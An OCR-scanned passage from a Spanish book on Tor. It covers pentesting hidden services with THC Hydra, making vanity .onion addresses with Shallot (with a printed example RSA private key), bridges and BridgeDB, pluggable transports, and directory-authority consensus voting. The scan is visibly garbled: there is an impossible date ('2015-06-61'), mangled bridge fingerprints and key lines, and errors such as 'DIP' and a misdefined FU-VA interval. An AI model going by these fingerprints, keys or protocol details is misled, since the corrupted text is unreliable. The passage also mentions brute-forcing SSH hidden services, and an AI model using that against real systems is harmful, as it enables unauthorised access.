Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-61 01:19:46 

adast ra@Galilei:/adast raData/Adast raRealm/Hacking/passwordCracking/thc-hyd ra$ 


Imogen 04.16: THC Hydra contra un servicio ocuho SSH. 


Como se puede apreciar, realizar procesos de pentesting contra servicios ocultos en Tor no es una 
tarea demasiado compleja, aunque si lo puede ser descubrir las direcciones de ciertos servicios 
ocultos. En ocasiones, algunos usuarios confunden anonimato con seguridad. creyendo que ambos 
terminos van de la mano en el mundo de la informatica y lo cierto es que no hay nada mas lejos de la 
realidad. Las vulnerabilidades o una mala configuration de un sistema no es menos evidente o mas 
dificil de explotar si dicho servicio se encuentre en la web profunda de Tor. Un servicio oculto en 
Tor o en cualquier otra red anonima es explotable si contiene alguna vulnerabilidad, los vectores de 
ataque no cambian, solamente cambia el medio utilizado por el atacante. 


4.2.4.3 Personalization de direcciones onion 

Tal como se ha explicado anteriormente, las direcciones “. onion ” de Tor son cadenas de texto con 
una longitud exacta de 16 caracteres y estan compuestas por los digitos entre 2-7 y las letras en 
minusculas de a-z. Dichas direcciones se calculan de forma automatica por la instancia de Tor, sin 
embargo es posible encontrar sitios en la web profunda con direcciones “.onion” que cuentan con 
patrones fijos, los cuales habitualmente estan relacionados con el contenido, tematica o nombre del 
servicio oculto. 

Un ejemplo es Facebook que cuenta con un servicio en la web profunda de Tor para aquellos que 
desean acceder dicha red social en la web profunda de Tor. La direccion “.onion” de Facebook 
en la web profunda de Tor es la siguiente: facebookcorewwwi.onion y como se puede apreciar, 
existe un patron bastante claro en las primeras letras de la direccion y ademas, resulta bastante 
facil de memorizar. Ahora bien, lo cierto es que personalizar la direccion completa, es decir, los 16 
caracteres que la componen, resulta practicamente imposible con la capacidad de computo de los 
ordenadores modemos en un tiempo aceptable. Calcular y en consecuencia, descubrir un servicio 
oculto en Tor, puede llevar anos, una escala de tiempo que evidentemente no es asumible en muchos 
casos. No obstante, si es posible personalizar una parte de dicha direccion en poco tiempo, todo 
depende del numero de caracteres del patron. Para hacer esto, existe una herramienta muy facil de 
instalar y utilizar, dicha utilidad es conocida como Shallot. 
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4.2.4.3.1 Instalacion y uso de Shallot para crear direccion onion personalizadas 

Shallot es una herramienta que permite aplicar un patron para personalizar una parte de la direccion 
“.onion” de un servicio oculto. Los patrones que se pueden aplicar tipicamente son expresiones 
regulares que permiten indicar la forma en la que se debe generar la clave privada del servicio 
oculto y en consecuencia, la direccion “.onion” del mismo. Es un programa que se encuentra escrito 
en lenguaje C y solamente tiene dos dependencias: libssl y libcrypto, librerias que son bastante 
comunes en sistemas basados en Linux. El proyecto se puede descargar desde su repositorio Github 
y el proceso de instalacion es tan simple como ejecutar “configure” y “make”. 

>git clone https://github.com/katmagic/Shallot.git 

>. / configure 

>make 

Las opciones que admite Shallot se pueden ver a continuacion: 

>./shallot 

Usage: shallot [-dmopv] [-f <file>] [-t count] [-x time] [-e limit] pattern 
-d : Daemonize (requires -f) 

-m : Monitor mode (incompatible with -f) 

-o : Optimize RSA key size to improve SHA-1 hashing speed 
-p : Print 'pattern' help and exit 
-f <file> : Write output to <file> 

-t count : Forces exactly count threads to be spawned 

-x secs : Sets a limit on the maximum execution time. Has no effect without -m 
-e limit : Manually define the limit for e 
Version: 0.0.3-alpha 


El interruptor “-p” puede ser util para conocer algunos de los patrones (expresiones regulares) que 
se pueden aplicar con Shallot. 

./shallot -p 

base32 alphabet allows letters [a-z] and digits [2-7] 
pattern can be a POSIX-style regular expression, e.g. 
xxx must contain 'xxx' 
bar$ must end with 'bar' 

A foo must begin with 'foo' 
b[a4]r may contain leetspeech ;) 

'■abided must begin with 'ab' or 'cd' 

[a-z]{16} must contain letters only, no digits 
A dusk.*dawn$ must begin with 'dusk' and end with 'dawn' 

Algunas de las expresiones de ejemplo permiten aplicar patrones muy variados, como por ejemplo 
que la direccion “.onion” deba comenzar y/o terminar con una cadena determinada, que contenga 
solamente numeros o letras o que contenga en cualquier posicion de la direccion una cadena 
determinada. Tambien existen otras opciones que permiten controlar el tiempo maximo en el que se 
debe ejecutar la herramienta, si se debe ejecutar como un proceso en background y si el resultado 
(clave privada para el servicio oculto) se debe almacenar en un fichero. Algunos ejemplos del uso de 
estos interruptores se ensenan a continuacion: 

>./shallot -f /home/adastra/private_key A hack 
>./shallot -m -o ''hacker 
>./shallot -m -t 15 ^hacker 
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En todos los casos, despues de procesar y descubrir una clave privada cuya direccion “.onion” 
generada contenga el patron indicado, se pinta por pantalla o se crea un fichero con la clave privada 
que se ha generado y que debe ser utilizada por un servicio oculto. Como se ha mencionado antes, el 
numero de caracteres especificados en el patron es importante y determina si es posible obtener una 
clave privada que encaje con el patron en un tiempo razonable. En el proyecto de Github de Shallot 
se ensena la siguiente tabla, la cual da una idea del numero de caracteres que se pueden personalizar 
en la direccion “.onion”. 


characters 

time to generate (approx.) 

1 

less than 1 second 

2 

less than 1 second 

3 

less than 1 second 

4 

2 seconds 

5 

1 minute 

6 

30 minute 

7 

1 day 

8 

25 days 

9 

2.5 years 

10 

40 years 

11 

640 years 

12 

10 millenia 

13 

160 millenia 

14 

2.6 million years 


Las pruebas anteriores las ha realizado el autor con un ordenador de 1.5 Gh de procesador. Si bien 
es cierto que se puede utilizar ordenadores mucho mas potentes, las estimaciones anteriores no 
sufren cambios considerables con una mayor capacidad de computo, ademas, solamente se ha 
llegado a calcular hasta 14 caracteres, la cifra con 15 y 16 caracteres puede llegar a billones de anos. 
Suponiendo que se utiliza un patron con pocos caracteres, se puede generar una clave privada en 
muy poco tiempo, de hecho, las dificultades comienzan a partir de 7 o 8 caracteres, pero cualquier 
patron que este por debajo de dicho valor, puede ser procesado por Shallot en un tiempo bastante 
razonable. Uno de los resultados que da la herramienta tras aplicar el patron “ A hack” es el siguiente: 

Found matching domain after 998147 tries: hacktkeocgipcjvv.onion 
—BEGIN RSA PRIVATE KEY— 

MIICWwIBAAKBgQCmZx9BMoG55KOoyAa0T43rNRW4z8m9vjgdXRxX2ZOaFMbrMITC 
U6zm5CaauBORYvuOm99/J9YhfXJQor69/YUIWMWGOXdn3CfVPML5kJWdCF68jhyE 
qmPJAaTuodv7 rwlB0KyTzOYOGNLDN/yZey9aG2CKWLfTX/w3Aq7c/6Y2 OQIDBKSB 
AoGABFqfSWmx3CIHO40PJCv2ecf61m7LZcAQErvXddYZDCodEYKXDypWJZatQjKm 
Whl9DGCZIMR3jpfVrKHVjwT8+ERk35DXdRGzWi0n/y8be5XokYMnTreEbkcsprR 
H8TeN6cJPwrjgXnd4g9Z2q91uKkDegdGLbsKY9nnh81f5oOCQQDZi+lDL7S/jEoX 
k5Xs805cTLPnqdGT0RelivchoGm03U2ggIUycCLv0SM6VaRcKNsBrGBtWg5j znu9 
Xm9865xvAkEAw9DuwqkXK+WixHVY+uoT+LUHmBRJiW+ZHKUzCOvF4yTxqGNCMAM 
LcuCZtiamFbA4YQnBHAMRpMJtl2/OSuAvwJAQjs2GYeqOmYE0MFt99KYhA2HHDny 
DpSzwriBqAKC/lzk/SnEyYw5nBb/+zLYS3+zNUEAEZ8ktwIFleFVriczdQJAE6qG 
q9J5kLbmVuyhkBB0zO5hcCE5EFVren5/XUGrzOzlhJbv4Q+9TkqDO3xaQ/v+iIqt 
hmu8XPNRhi50Q4vXhwJAQywFaZosVqFLUPJB4AmMeKQ2nPHpSLWWFVPNNTypDZC 
LDJgX849UGdONu9bCTWFtJaFROGUOa8U2cIsa8N6iQ== 

—END RSA PRIVATE KEY— 
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A continuation, solamente es necesario incluir el contenido anterior en un fichero con nombre private_ 
key”, el cual se debera ubicar en el directorio que se declara en la propiedad "HiddenServiceDir del 
fichero de configuration de Tor ( torrc ). 

HidenServiceDir /horae/adastra/servicioOculto 
HiddenServicePort 80 127 . 0 . 0 . 1:80 

Con las dos directivas anteriores se define un servicio oculto que va a procesar peticiones de los 
clientes por el puerto 80 en la direction “.onion” generada. En el caso del ejemplo anterior, el fichero 
“private Jcey” con la clave RSA generada por Shallot debe ubicarse en el directorio “/ home/adastra/ 
servicioOculto”. Una vez hecho esto, basta con arrancar la instancia de Tor utilizando el fichero 
“torrc” con las propiedades de configuration anteriores y se podra ver que en el directorio /home/ 
adastra/servicioOculto ” se creara un nuevo fichero con el nombre “ hostname ”, el cual contiene la 
direction “.onion” que ha sido generada a partir de la clave privada definida en el fichero private_ 
key”. 

Con estos sencillos pasos se puede personalizar una parte de la direction “.onion” de un servicio 
oculto, algo que en algunos casos es bastante conveniente para tener direcciones que sean un poco 
mas faciles de recordar y compartir. 


4.2.5 Puentes 

Tor se caracteriza por ser una red centralizada en la que en cada hora, las autoridades de directorio 
se encargan de generar information sobre los repetidores que conforman la red y algunos datos 
adicionales sobre el estado general de la misma. Dicha information es publica y se puede consultar 
facilmente ejecutando peticiones HTTP contra cualquiera de las autoridades de directorio o sus 
espejos. Dado que la information sobre los repetidores la puede consultar cualquiera, una de las 
principales medidas que toman las entidades represoras a la hora instaurar controles y censurar 
contenidos, consiste simplemente en incluir dichas direcciones IP en una lista negra para impedir 
que se puedan realizar conexiones contra las autoridades de directorio o cualquier repetidor de Tor. 
Es una medida que se utiliza muchisimo y que segun algunos articulos publicados en el blog de Tor 
(https://blog.torproject.org/) es de las mas utilizadas en paises como Cuba, China, Etiopia, Corea del 
Norte, entre muchos otros sitios. 

Con el fin de hacer que la red sea resistente a este tipo de censura,el equipo de Tor ha desarrollado 
un sistema para que los ciudadanos de paises como los anteriores puedan seguir utilizando Tor sin 
problemas, aunque las direcciones IP de los repetidores incluidos en los consensos o incluso las 
propias direcciones IP de las autoridades de directorio se encuentren bloqueadas. Dicho sistema 
es conocido como “Automatic Bridging” y es un mecanismo en el que se busca eludir la censura 
por parte de adversaries fuertes, como es el caso del gobiemo de un pais. Para conseguir esto, 
las autoridades de directorio utilizan unos repetidores especiales llamados puentes (‘ Bridges ), los 
cuales funcionan exactamente igual que cualquier repetidor que hace parte de un circuito en Tor, 
pero con la diferencia de que no se exponen publicamente en los descriptores emitidos cada hora por 
las autoridades de directorio. Los puentes pueden ser creados por cualquier usuario de Tor y es una 
buena forma de aportar al proyecto, ya que las instancias que funcionan como puentes suelen ser 
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utilizadas por aquellas personas que desean reportar los abusos que se comenten en ciertos lugares 
del mundo. Para aquellos que desean obtener un listado de puentes de Tor, dado que no se pueden 
conectar directamente con las autoridades de directorio o con los repetidores que conforman la red, 
existen dos mecanismos que se listan a continuacion. 

1. Consultar los puentes en el servicio “ BridgeDB ”. Se trata del proyecto oficial de Tor para 
acceder a un conjunto reducido de puentes que serviran para eludir la censura. Dicho proyecto se 
encuentra ubicado en el siguiente enlace: https://bridges.torproject.org. Para obtener los puentes 
basta con pinchar sobre el boton en el que pone “Get Bridges ” u “Obtener puentes” y despues de 
ingresar un captcha, se ensenaran dos puentes que deben ser configurados en la instancia de Tor 
que no consigue llegar a las autoridades de directorio o a los repetidores de la red. 


BridgeDB The Tor Project 


Here are your bridge lines: 

125.212.251.105:400 5F615D93ec519C3D993Ee*9AC2«6n2C3165aA691 
95.105.187.142:9010 9*2926FAS32rA7AS250E07D477AE2E2lB44240re 
73.177.195.14:443 EC37CS1«09B552BBAA~656CDFE1C2CS44DE5A170 


Bv. □□ 

Select All □!!* Show QP.Cede 


Howto start using your bridges 


Toenterbridges into Tor Browser.firstgotothe Tor 3r owser c... c : and then 

follow the instructions there for downloading and starting Tor Browser. When the Tor 
Network Settings' dialogue pops up. dick Configure' and follow the wizard until it 
asks: 

Does your Internet Service Provider (ISP) block or otherwise 
censor connections to the Tor network? 

Select 'Yes'and then click 'Next'.To configure your new bridges, copy and paste the 
bridge lines into the text input box. Finally, click 'Connect', and you should be good to 
go! If you experience trouble, try clicking the 'Helpf button in the Tor Network 
Settings' wizard for further assistance. 


What are bridges? 

Bridges are Tor relays that help you circumvent censorship. 

Imogen 04.1 7 : Servicio de bridges de Tor Project. 


2. En el caso de que el proyecto “ BridgeDB ” tambien se encuentre censurado, la otra altemativa 
para recibir un conjunto de puentes validos es escribir un correo a la direccion “bridges® 
torproject.org”. El mensaje no tiene que tener un contenido, es simplemente una direccion de 
correo que responde de forma automatica al remitente con lo que ha solicitado. En el asunto 
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del mensaje se debe especificar un comando para obtener information sobre BridgeDB. Si se 
envia un mensaje a dicha direction, sin asunto, la respuesta automatica contendra los posibles 
comandos que puede enviar como asunto del mensaje. 

El contenido del mensaje devuelto, en el caso de no incluir un asunto es el siguiente: 

"Hey, debiadastra! Welcome to BridgeDB! 

COMMANDS: (combine COMMANDS to specify multiple options simultaneously) 
get bridges Request vanilla bridges. 

get transport [TYPE] Request a Pluggable Transport by TYPE, 
get help Displays this message. 

get key Get a copy of BridgeDB's public GnuPG key. 
get ipv6 Request IPv6 bridges. 

Currently supported transport TYPEs: 

obfs2 

obfs3 

obfs4 

scramblesuit 

fte 

BridgeDB can provide bridges with several types of Pluggable Transports[0], 
which can help obfuscate your connections to the Tor Network, making it more 
difficult for anyone watching your internet traffic to determine that you are 
using Tor. 

Some bridges with IPv6 addresses are also available, though some Pluggable 
Transports aren't IPv6 compatible. 

Additionally, BridgeDB has plenty of plain-ol'-vanilla bridges - without any 
Pluggable Transports - which maybe doesn't sound as cool, but they can still 
help to circumvent internet censorship in many cases. 

[0]: https://www.torproject.org/ 

<3 BridgeDB'' 

En el caso de indicar el asunto “get bridges ”, lo que se puede ver es lo siguiente: 

"Hey, debiadastra! 

[This is an automated message; please do not reply.] 

Here are your bridges: 

83.212.Ill.114:443 0A6EF34EDF047BFD51319268CD423E 
194.132.208.140:1418 E6F48300BB17180451522069F16BD5 
192.36.31.74:22656 FEB63CA5EBD805C42DC0E5FBDDE82F 

To enter bridges into Tor Browser, first go to the Tor Browser download 
page [0] and then follow the instructions there for downloading and starting 
Tor Browser. 

When the 'Tor Network Settings' dialogue pops up, click 'Configure' and follow 
the wizard until it asks: 

> Does your Internet Service Provider (ISP) block or otherwise censor connec¬ 
tions 

> to the Tor network? 

Select 'Yes' and then click 'Next' . To configure your new bridges, copy and 
paste the bridge lines into the text input box. Finally, click 'Connect', and 
you should be good to go! If you experience trouble, try clicking the 'Help' 
button in the 'Tor Network Settings' wizard for further assistance. 

[0]: https://www.torproject.org/ 
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Ha devuelto tres repetidores con la direction IP, puerto y fingerprint del puente. Ahora, para que 
una instancia de Tor pueda utilizar dichos puentes, basta con especificar las siguientes llneas en el 
fichero “ lorrc ”. 

Bridge 83.212.111.114:443 
Bridge 194.132.208.140:1418 
Bridge 192.36.31.74:22656 
UseBridges 1 

En el caso de utilizar Tor Browser, es posible especificar estas direcciones directamente en la 
configuracion del navegador tal como se ensena en la siguiente imagen. 



Imogen 04.18: Configuracion de "bridges" en Tor Browser. 


Para crear una instancia que funcione como puente, el procedimiento es bastante sencillo, la unica 
restriction es que evidentemente no se puede configurar dicha instancia para que funcione como 
repetidor y puente al mismo tiempo, ya que los repetidores son publicos y los puentes deben ser 
privados. La configuracion que se debe incluir en el fichero de configuracion de la instancia de Tor 
es la siguiente: 

SocksPort 0 
ORPort 8080 
Exitpolicy reject *:* 

DataDirectory /home/adastra/workspace/bridge/ 

BridgeRelay 1 

Como se puede apreciar, tanto configurar como utilizar un puente es una tarea bastante simple y es 
una solution que se ajusta bastante bien al problema de la censura. Sin embargo, algunos rivales 
fuertes ahora ya no solamente bloquean las direcciones IP que se encuentren relacionadas con la 
red de Tor, sino que tambien aplican tecnicas de analisis de trafico para detectar si los paquetes 
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intercambiados utilizan el protocolo de Tor. Ante una medida asi, los puentes por si solos pierden 
efectividad y se hace muy diffcil ocultar el hecho de que un cliente utiliza Tor. La solucion que se 
ha iraplementado desde el equipo de Tor Project es lo que se conoce como “ Pluggable Transports 


4.2.5.I. Pluggable Transports en Tor 

Las tecnicas DIP (Deep Packet Inspection) se han vuelto cada vez mas comunes en aquellos paises 
en los que el nivel de censura es alto y consisten en el analisis de un conjunto de paquetes de datos 
para posteriormente clasificarlos partiendo de patrones conocidos. De esta forma, con DIP es posible 
determinar que un conjunto de paquetes se encuentran transmitiendo datos en la red de Tor aunque 
la direction IP del destino no se encuentre bloqueada, como es el caso de las direcciones IP de los 
puentes en Tor. 

La especificacion de '‘Pluggable Transports ” en Tor se define como una tecnologia que tiene 
la capacidad de convertir flujos de trafico entre el cliente y un puente en flujos admitidos y no 
reconocidos por tecnicas de DIP, como por ejemplo, un flujo de datos normal con cualquier servidor 
web en Internet. Notar que aunque el rival (censor), pueda monitorizar el trafico y analizar los 
paquetes en profundidad, no vera ningun patron conocido que le permita determinar con exactitud 
que se trata de un paquete que viaja por Tor. 

El objetivo de los PT ( Pluggable Transports) en Tor es el de ofuscar el trafico entre el cliente y 
los puentes. Para ello, se utiliza un componente de software adicional tanto en el cliente como en 
la instancia que se encarga de manipular las peticiones y transformarlas adecuadamente. Dichos 
componentes siguen una serie de reglas para poder ofuscar el trafico en el cliente y posteriormente, 
desofuscarlo en el servidor (puente). Actualmente existen varias herramientas y frameworks 
desarrollados siguiendo la especificacion de PT, las cuales se encuentran ubicadas en el siguiente 
enlace https://gitweb.torproject.org/torspec.git/tree/pt-spec.txt y seguramente la mas conocida y 
popular es OBFSPROXY. 



Imogen 04.19: Funcionamiento de los Pluggable Transpons. 


La especificacion de "Pluggable Transports’’' esta disenada para que sea independiente de cualquier 
solucion de anonimato y ensena las directrices que debe seguir cualquier implementation de PTs. En 
el caso de Tor, existen varias implementaciones de dicha especificacion, las cuales se pueden utilizar 
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muy facilmente en cualquier instancia de Tor. Los PT de uso comun en Tor son Meek y ObsProxy 
ya que son las mas soportadas y en consecuencia recomendadas. 

Obsproxy es un framework escrito en Python que implementa la especificacion de PT, el cual 
utiliza Twisted para todas las operaciones de red y la libreria pyptlib, creada por el equipo de Tor 
especificamente para soportar las caracteristicas de la especificacion. Es una libreria especialmente 
interesante para aquellas aplicaciones que se encargan de transformar y ofuscar trafico TCP y que 
requieren enviar dichos flujos de paquetes a un destino determinado utilizando un circuito de Tor. 

Para utilizar Obsproxy en el lado del cliente se puede utilizar Tor Browser, el cual contiene las 
implementaciones de los principales PTs soportados en Tor. En este caso concreto, Obsproxy y las 
otras implementaciones de PTs se encuentran incluidas en el directorio il <TOR_BROWSER_DIR>/ 
Browser/TorBrowser/Tor/PIuggableTransports”. Dichas implementaciones pueden utilizarse en 
modo cliente cuando se arranca Tor Browser y su configuracion es practicamente automatica por 
medio de un asistente muy simple, el cual se inicia al abrir la configuracion de Tor Browser. 



Imogen 04.20: Configuracion del cliente de Tor Browser. 


Como se puede apreciar en la imagen anterior, existen dos posibles escenarios, o bien el cliente se 
encuentra en un entomo censurado y sus peticiones son filtradas o el cliente cuenta con una conexion 
directa a Internet, con lo cual no tendra mayores inconvenientes a la hora de conectarse a la red de 
Tor. 

En el primer caso, el asistente de Tor Browser le permite al cliente especificar cual tipo de PT desea 
utilizar y a continuation, se encarga de configurar la instancia con el PT seleccionado. 
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Imogen 04.21: Seleccion de OBFS3 en Tor Browser. 


Despues de seleccionar el tipo de PT la conexion a la red de TOR se hara por medio de los puentes que 
vienen por defecto en Tor Browser y ademas, todas las peticiones se haran a un servidor OB S Proxy 
por medio del cliente obfs3 local que se ha indicado. En el caso de que no sea posible realizar la 
conexion a la red de Tor utilizando los puentes OBFS3 por defecto, Tor Browser indicara que hay un 
censor que se encuentra bloqueando las peticiones a dichas maquinas y en tal caso, se debe solicitar 
un conjunto de puentes nuevo tal como se ha explicado en parrafos anteriores. 

En este caso, el fichero ‘Torre” utilizado por Tor Browser habra sufrido algunos cambios despues 
de aplicar la configuracion anterior y como se puede ver a continuacion, dichos cambios incluyen el 
uso de Bridges OBFS3. 

Bridge obfs3 169.229.59.74:31493 AF9F66B7B04F8FF6F32D455F05135250A16543C9Bridge 
obfs3 83.212.101.3:80 A09D536DD1752D542E1FBB3C9CE4449D51298239 
Bridge obfs3 169.229.59.75:46328 AF9F66B7B04F8FF6F32D455F05135250A16543C9 
Bridge obfs3 109.105.109.163:47779 4C331FA9B3D1D6D8FB0D8FBBF0C259C360D97E6A 
Bridge obfs3 109.105.109.163:38980 1E05F577A0EC0213F971D81BF4D86A9E4E8229ED 
DataDirectory /home/adastra/tor-browser_es-ES/Browser/TorBrowser/Data/Tor 
GeoIPFile /home/adastra/tor-browser_es-ES/Browser/TorBrowser/Data/Tor/geoip 
GeoIPv6File /home/adastra/tor-browser_es-ES/Browser/TorBrowser/Data/Tor/geoip6 
UseBridges 1 

Por otro lado, en el combo en el que se puede seleccionar un PT, tambien se pueden apreciar otras 
altemativas, tales como “meek-amazon”, “ meek-azure ” y “meek-google”. En este caso, el PT Meek 
se basa en HTTPS y se encarga de modificar el trafico de Tor para que las peticiones parezean 
“inocentes”, por ejemplo, “meek-amazon” se encarga de transformar las peticiones para que parezea 
que el usuario se encuentra interactuando con la plataforma de Amazon Web Services, “meek- 
azure” para que parezea que las peticiones se realizan contra la plataforma de servicios web de 
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Microsoft Azure y finalmente “meek-google” modifica los paquetes de datos para que parezca que 
las peticiones realizadas por el cliente, son simplemente busquedas en Google. Si bien es un PT muy 
interesante, a la fecha de redactar este documento hay varios detalles que se encuentran en estado 
de desarrollo y la cantidad de PT del tipo servidor (puentes) es bastante pequena, por ese motivo 
siempre se recomienda utilizar el PT de ObsProxy. 

4.2.6 Autoridades de directorio 

Las autoridades de directorio o tambien conocidos simplemente como “Tor directories”, se encargan 
de gestionar todos los detalles de la red y almacenar informacion sobre los repetidores disponibles 
en todo momento. Las autoridades de directorio en Tor tienen como principal objetivo garantizar 
el correcto funcionamiento de la red y son los unicos servidores que se consideran de confianza en 
Tor, lo cual la convierte en una red centralizada de la que depende el funcionamiento completo del 
entomo. A lo largo de la historia de Tor, desde sus inicios, ha habido varias modificaciones en el 
funcionamiento de las autoridades de directorio y el protocolo de directorio de Tor, el cual determina 
las reglas basicas para que las autoridades directorio puedan gestionar adecuadamente todos los 
eventos que se producen en la red. Dicho protocolo, a la fecha de redactar este documento ha sufrido 
tres modificaciones importantes, las cuales han aportado mejoras funcionales muy importantes que 
han convertido a la red de Tor en lo que es hoy en dia, una solution de anonimato muy robusta y 
soiida. A continuation se explicara el funcionamiento de cada una de estas especificaciones. 

VI: En las primeras versiones de Tor se definio el concepto autoridades de directorio, que no eran 
mas que repositonos confiables donde se podian consultar los descriptores de los enrutadores que 
componian la red, ademas de almacenar informacion relacionada con cada uno de estos nodos 
y su estado. De esta forma, los clientes podian consultar estos servidores y obtener informacion 
actual izada sobre estado de la red de forma automatica. Posteriormente surgio el concepto de “caches 
de directorio que permitian ahorrar ancho de banda y recursos, ya que son simplemente instancias 
que descargan los descriptores desde las autoridades de directorio y los ponen a disposition de 
los clientes. Las caches de directories rapidamente se convirtieron en un elemento fundamental en 
la red, ya que los clientes consultan las caches en lugar de las autoridades de directorio de forma 
directa, ayudando de esta forma a la distribution del trabajo. 

V2: En esta version del protocolo, se parte del conocimiento previo del uso de las caches y autoridades 
de directorio y el objetivo en esta version es el de solventar ciertos problemas que se detectaron en 
la implementation de la primera version: 

- En la medida que la red crecia en numero de usuarios y repetidores, los registros que 
almacenaban las caches y las autoridades crecian constantemente y muchas de las descargas 
que realizaban los clientes consistian principalmente en “router descriptors ” que estos ya 
habian descargado previamente, con lo cual se podia detectar un procesamiento innecesario 
de descriptores que ya habian sido descargados previamente por el cliente. 

- Las autoridades de directorio tenia un problema grave relacionado con la confianza que se 
debia tener sobre otros servidores que podian actuar como autoridades de directorio, ya que si 
por ejemplo uno de dichos servidores era malicioso, los clientes que descargaran descriptores 
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del servidor en cuestion tendrian una vista arbitrariamente distorsionada y dado que los 
clientes confian mas en los documentos recientemente descargados se convierte en una 
situacion conflictiva en funcion al numero de autoridades existentes. Entre mas autoridades 
se encontraran involucradas, era mas dificil garantizar que la red fuera segura y liable. 

Para solucionar estos problemas, en esta especificacion del protocolo se han implementado algunas 
mejoras. En primera instancia, en lugar de descargar los descriptores correspondientes a todos los 
enrutadores de la red, los clientes solamente descargan aquellos que no se encuentren registrados en 
su instancia local, de esta forma se genera un ahorro en terminos de banda ancha y recursos. Por otro 
lado en esta version, las autoridades de directorio publican cada hora, un documento firmado conocido 
como “ network status ” que contiene detalles importantes sobre cada enrutador que conforma la red. 
Dichos documentos corresponden a la vision particular de cada una de las autoridades de directorio, 
los clientes descargan dichos documentos y deciden fiarse de la information que contienen si estos 
eran confirmados por mas de la mitad de las autoridades. Por este motivo, como se vera mas adelante, 
es necesario que todos los servidores que desean actuar como una autoridad de directorio tengan una 
“certification de confianza” por parte de todas las autoridades de directorio que conforman la red. 

V3: En esta ultima version no se realizan cambios tan drasticos como los que han tenido lugar entre 
las versiones VI y V2, sin embargo se pueden apreciar mejoras sustanciales que permiten optimizar 
el rendimiento de las autoridades de directorio y el consumo de recursos y ancho de banda. Estos 
fueron los principales objetivos en la especificacion V3. 

- Se ha ahorrado aproximadamente un 60% del ancho de banda utilizado por los clientes 
al cambiar dos campos que no eran utilizados por los enrutadores de Tor: “ read-history ” y 
“ write-history ”. Estos dos campos han sido movidos a un documento separado del “ network- 
status ” dado que muchos de los clientes no los utilizan. 

- La caracteristica mas llamativa es que ha surgido el concepto de “ consensus network 
status ”. En versiones antiguas del protocolo de directorio los clientes debian hacer una 
correlation de multiples documentos sobre el estado de la red, cada uno emitido de forma 
independiente por cada autoridad de directorio. En esta version, las autoridades de directorio 
generan un documento unico que es el resultado de un proceso de votacion, en el que todas 
las autoridades deciden cuales repetidores pueden hacer parte de la red y cuales no. Dicho 
documento es conocido como “ consensus network status document ”. 

A partir de la especificacion V3 se introduce el proceso de votacion que actualmente es tan 
caracteristico en las autoridades de directorio. Dicho proceso se describe a continuation. 


4.2.6.1 Proceso de votacion y generation de consenso 

El mecanismo de consenso comienza con la sincronizacion de tiempos y en la definition de unos 
intervalos que suelen ser de 5, 15, 30, 60 y 90 minutos, dividiendo asi las 24 horas del dia. Cada 
autoridad debe actuar acorde a los intervalos en el consenso mas reciente. Todos los administradores 
de las autoridades de directorio se encargan de sincronizar sus relojes para que tengan un tiempo 
preciso, normalmente utilizando NTP para ello. 
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El numero de autoridades en la red de Tor a la fecha de redactar este documento son 9, pero se 
pueden consultar en tiempo real gracias al servicio “Atlas”, el cual se puede consultar en el siguiente 
enlace: https://atlas.torproject.Org/#search/flag:Authority 

Las direcciones de cada autoridad de directorio vienen incluidas en el software de Tor. Todas las 
autoridades estan obligadas a enviar su “voto” en los intervalos de tiempo deftnidos anteriormente 
y dicho voto, no es mas que un resumen firmado con los descriptores de los enrutadores registrados 
en la red. Las autoridades computan el resultado de los votos y generan un documento firmado 
conocido como “ consensus status”. Dicho documento almacena el resultado de la votacion junto 
con toda la information de los repetidores que han sido aceptados en el proceso de votacion. Dicho 
documento es distribuido entre todas las caches de directorio y cualquier cliente puede descargar el 
documento ejecutando una peticion HTTP simple. 

Cada documento de consenso tiene 3 marcas que determinan su validez, VA (ValidAfter) FU (Fresh 
Until) y VU (Valid Until), donde FU debe estar entre VA y VU. Cada uno de estos documentos 
se mantiene hasta que el siguiente consenso ftnaliza, generando a su vez un nuevo documento de 
consenso. Esto no significa que el consenso anterior pierda validez, de hecho, siempre existen al 
menos tres documentos de consenso que se mantienen validos en cualquier momento. 

En el ciclo de un consenso entre autoridades se tienen en cuenta las siguientes variables: 

- VOTESECONDS: Numero de segundos durante los cuales una autoridad dada puede 
recolectar votos de otras autoridades. Asume un valor mayor o igual a 20 segundos. 

- DISTSECONDS: Numero de segundos durante los cuales una autoridad de directorio 
puede recolectar las firmas de otras autoridades y votos que aun no tenga. Asume un valor 
mayor o igual a 20 segundos. 

- VA: Momento exacto en el que es generado un nuevo documento consensuado “ network- 
status ”. 

- VU: Momento exacto en el que un documento consensuado “ network-status ” deja de ser 
valido. 

- FU-VA: Diferencia entre el tiempo de FU y VU, este valor debe ser de al menos 5 minutos. 
Este es el periodo de tiempo en el que el consenso es considerado como el mas reciente. 

- VU-FU: Diferencia entre el tiempo de VU y FU, este valor debe ser de al menos 5 
minutos. Este es el periodo de tiempo en el que el consenso deja de ser el mas reciente pero 
aun es valido. 

Con estas mediciones se puede comenzar a explicar de la forma mas clara posible, los calculos que 
se llevan a cabo para que las autoridades de directorio puedan generar un fichero “ network-status ” 
consensuado. 

1. VA-DISTSECONDS-VOTESECONDS: Las autoridades intercambian sus votos antes de 
establecer el correspondiente consenso. Para ello lo publican en http://<hostname>/tor/statusvote/ 
next/authority.z y realizan una peticion HTTP POST a cada autoridad en http://<hostname>/tor/post/ 
vote 
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2. VA-DISTSECONDS-(VOTESECONDS/2): Las autoridades ahora intentan descargar los votos 
que no tengan de las demas autoridades. 

3. VA-D1STSECONDS: Las autoridades calculan el consenso e intercambian firmas. Una vez una 
autoridad tiene el estado actual de todas las demas autoridades, lo publican en: 

http://<hostname>/tor/status-vote/next/<fp>.z donde <fp> es el fingerprint de la clave de identidad 
de la otra autoridad y tambien se hara disponible el digest del voto en http://<hostname>/tor/ 
statusvote/next/d/<digest>.z 

4. VA-(DISTSECONDS/2): Las autoridades tratan de descargar cualquier firma que no tengan. 
Estas firmas se almacenan en http://<hostname>/tor/status-vote/next/consensus-signatures.z 

5. VA: Todas las autoridades han firmado un nuevo consenso. En este intervalo cada autoridad tambien 
necesita enviar su firma a las demas autoridades en una peticion POST a la url: http://<hostname>/ 
tor/post/consensus-signature 

6. VA ... FU: En este intervalo de tiempo las caches de directorio descargan los documentos de 
consenso con el fin de que esten disponibles a otros clientes en la red de TOR. 

7. FU: Una vez llegado a este tiempo, se asume que un nuevo consenso se encuentra disponible y 
que ahora, el consenso actual no es el mas reciente, no obstante sigue siendo valido. 

8. FU ... VA: En este intervalo de tiempo, los clientes descargan el consenso desde los directorios 
de cache. 

